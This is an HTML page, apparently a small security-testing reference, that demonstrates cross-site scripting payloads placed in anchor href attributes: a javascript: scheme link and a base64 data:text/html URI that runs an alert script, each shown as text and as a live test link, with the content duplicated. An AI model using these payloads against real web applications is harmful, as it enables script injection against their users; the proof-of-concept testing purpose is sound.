mfaerevaag/index.html

## index.html
<h1>JavaScript payloads in a#href attributes using mimetypes</h1>

<b>Scenario:</b>
<pre>&lt;a href="[PAYLOAD]"&gt;&lt;/a&gt;</pre>

<b>Examples:</b>
<table border="1">
  <thead>
    <tr>
      <th>Description</th>
      <th>Payload</th>
      <th>Test</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Javascript scheme</td>
      <td><pre>&lt;a href="javascript:alert(1)"&gt;Test&lt;/a&gt;</pre></td>
      <td><a href="javascript:alert(1)">Test</a></td>
    </tr>
    <tr>
      <td>Data scheme with text/html and base64 mimetype</td>
      <td><pre>&lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;test&lt;/a&gt;</pre></td>
      <td><a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">test</a></td>
    </tr>
  </tbody>
</table>
	<h1>JavaScript payloads in a#href attributes using mimetypes</h1>

	<b>Scenario:</b>
	<pre><a href="[PAYLOAD]"></a></pre>

	<b>Examples:</b>
	<table border="1">
	<thead>
	<tr>
	<th>Description</th>
	<th>Payload</th>
	<th>Test</th>
	</tr>
	</thead>
	<tbody>
	<tr>
	<td>Javascript scheme</td>
	<td><pre><a href="javascript:alert(1)">Test</a></pre></td>
	<td><a href="javascript:alert(1)">Test</a></td>
	</tr>
	<tr>
	<td>Data scheme with text/html and base64 mimetype</td>
	<td><pre><a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">test</a></pre></td>
	<td><a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">test</a></td>
	</tr>
	</tbody>
	</table>